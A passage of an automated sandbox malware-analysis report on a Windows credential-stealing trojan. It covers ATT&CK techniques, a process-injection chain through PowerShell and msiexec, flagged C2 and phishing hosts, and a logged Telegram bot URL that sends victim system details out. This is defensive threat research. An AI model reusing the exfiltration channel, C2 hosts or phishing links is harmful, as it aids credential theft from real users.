          Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: File and Directory Discovery (2); System Information Discovery (14); Security Software Discovery (111); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture
          Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1586021  Sample: HVSU7GbA5N.exe  Startdate: 08/01/2025  Architecture: WINDOWS  Score: 100

          Start
            DNS/IP: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP))
            DNS/IP: api.telegram.org (signature: Uses the Telegram API (likely for C&C communication))
            DNS/IP: 4 other IPs or domains
            Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 6 other signatures
            -> HVSU7GbA5N.exe (1, 22) started
               -> powershell.exe (29) started
                  Dropped: C:\Users\user\AppData\...\HVSU7GbA5N.exe, PE32
                  Dropped: C:\Users\...\HVSU7GbA5N.exe:Zone.Identifier, ASCII
                  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
                  -> msiexec.exe (15, 8) started
                     DNS/IP: checkip.dyndns.com 132.226.8.169, ports 49711, 49714, 49716, UTMEMUS, United States
                     DNS/IP: api.telegram.org 149.154.167.220, ports 443, 49728, TELEGRAMRU, United Kingdom
                     DNS/IP: 3 other IPs or domains
                     Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                  -> conhost.exe started

          Source | Detection | Scanner | Label | Link
          HVSU7GbA5N.exe | 32% | ReversingLabs | Win32.Trojan.Leonem |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe | 32% | ReversingLabs | Win32.Trojan.Leonem |

          No Antivirus matches

          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          http://www.microsoft.csU | 0% | Avira URL Cloud | safe |
          http://varders.kozow.com:8081 | 100% | Avira URL Cloud | malware |
          http://aborters.duckdns.org:8081 | 100% | Avira URL Cloud | phishing |
          http://crl.microsoft( | 0% | Avira URL Cloud | safe |
          http://anotherarmy.dns.army:8081 | 100% | Avira URL Cloud | phishing |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          drive.google.com | 142.250.184.238 | true | false | | high
          drive.usercontent.google.com | 142.250.181.225 | true | false | | high
          reallyfreegeoip.org | 188.114.97.3 | true | false | | high
          api.telegram.org | 149.154.167.220 | true | false | | high
          checkip.dyndns.com | 132.226.8.169 | true | false | | high
          checkip.dyndns.org | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] | false | | high
          http://checkip.dyndns.org/ | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://duckduckgo.com/ac/?q= | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.telegram.org | msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.telegram.org/bot | msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://drive.usercontent.google.com/# | msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://www.microsoft.csU | powershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://contoso.com/License | powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.office.com/lB | msiexec.exe, 00000009.00000002.2665789154.000000002325A000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://chrome.google.com/webstore?hl=enp | msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000009.00000002.2665789154.000000002322E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://varders.kozow.com:8081 | msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          https://www.google.com | msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://crl.microsoft( | powershell.exe, 00000002.00000002.2010747235.0000000003408000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://drive.google.com/ | msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://www.office.com/p | msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://contoso.com/ | powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://chrome.google.com/webstore?hl=enlB | msiexec.exe, 00000009.00000002.2665789154.0000000023229000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://apis.google.com | msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.office.com/ | msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://translate.google.com/translate_a/element.js | msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://contoso.com/Icon | powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://drive.usercontent.google.com/ | msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.org | msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://www.microsoft. | powershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | HVSU7GbA5N.exe, HVSU7GbA5N.exe.2.dr | false | | high
          https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://www.ecosia.org/newtab/ | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://aborters.duckdns.org:8081 | msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a | msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | HVSU7GbA5N.exe, HVSU7GbA5N.exe.2.dr | false | | high
          http://anotherarmy.dns.army:8081 | msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://reallyfreegeoip.org/xml/8.46.123.189$ | msiexec.exe, 00000009.00000002.2665789154.00000000230E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002312B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://reallyfreegeoip.org | msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002312B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586021
Start date and time: 2025-01-08 16:19:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HVSU7GbA5N.exe (renamed because the original name is a hash value)
Original Sample Name: 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/11@5/5
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 126
• Number of non-executed functions: 27
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 3504 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: HVSU7GbA5N.exe
Time | Type | Description
10:20:05 | API Interceptor | 43x Sleep call for process: powershell.exe modified
10:21:23 | API Interceptor | 1359x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | document pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.8.169 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.8.169 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | 0001.exe | malicious | Snake Keylogger | checkip.dyndns.org/
149.154.167.220 | oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | proforma invoice pdf.exe | malicious | AgentTesla, PureLog Stealer |
149.154.167.220 | spreadmalware.exe | malicious | XWorm |
149.154.167.220 | random.exe | malicious | CStealer |
149.154.167.220 | random.exe | malicious | CStealer |
149.154.167.220 | HaLCYOFjMN.exe | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT |
149.154.167.220 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc |
149.154.167.220 | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | Resource.exe | malicious | Blank Grabber |
149.154.167.220 | user.exe | malicious | Unknown |
188.114.97.3 | KSts9xW7qy.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
188.114.97.3 | GTA5-elamigos.exe | malicious | Esquele Stealer | /api/get/dll
188.114.97.3 | DHL DOCS 2-0106-25.exe | malicious | FormBook | www.uzshou.world/ricr/
188.114.97.3 | Order Inquiry.exe | malicious | FormBook | www.cifasnc.info/8rr3/
188.114.97.3 | Gg6wivFINd.exe | malicious | DCRat, PureLog Stealer, zgRAT | unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
188.114.97.3 | Payment Receipt.exe | malicious | FormBook | www.cifasnc.info/8rr3/
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | VSLS SCHEDULE_pdf.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | ungziped_file.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | fatura098002.exe | malicious | MassLogger RAT | 188.114.97.3
reallyfreegeoip.org | Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 188.114.97.3
reallyfreegeoip.org | New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | malicious | MassLogger RAT | 188.114.97.3
reallyfreegeoip.org | FORTUNE RICH_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 188.114.97.3
reallyfreegeoip.org | document pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
api.telegram.org | oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | proforma invoice pdf.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
api.telegram.org | spreadmalware.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | random.exe | malicious | CStealer | 149.154.167.220
api.telegram.org | random.exe | malicious | CStealer | 149.154.167.220
api.telegram.org | HaLCYOFjMN.exe | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | 149.154.167.220
api.telegram.org | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Resource.exe | malicious | Blank Grabber | 149.154.167.220
api.telegram.org | user.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | UpdaterTool.exe | malicious | Unknown | 149.154.167.220
checkip.dyndns.com | oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | VSLS SCHEDULE_pdf.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | ungziped_file.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | fatura098002.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | 193.122.6.168
checkip.dyndns.com | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | FORTUNE RICH_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | document pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          TELEGRAMRUoagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          http://t.me/hhackplusGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.99
                                                                                                                                          Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          CLOUDFLARENETUSKSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.18.95.41
                                                                                                                                          https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.18.86.42
                                                                                                                                          XL-1-6-25-(EXCEL LATEST 2025).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          http://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9Get hashmaliciousPhisherBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8=Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.coGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                          • 104.21.53.168
                                                                                                                                          UTMEMUSoagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 132.224.247.83
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adoagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eoagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          web55.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
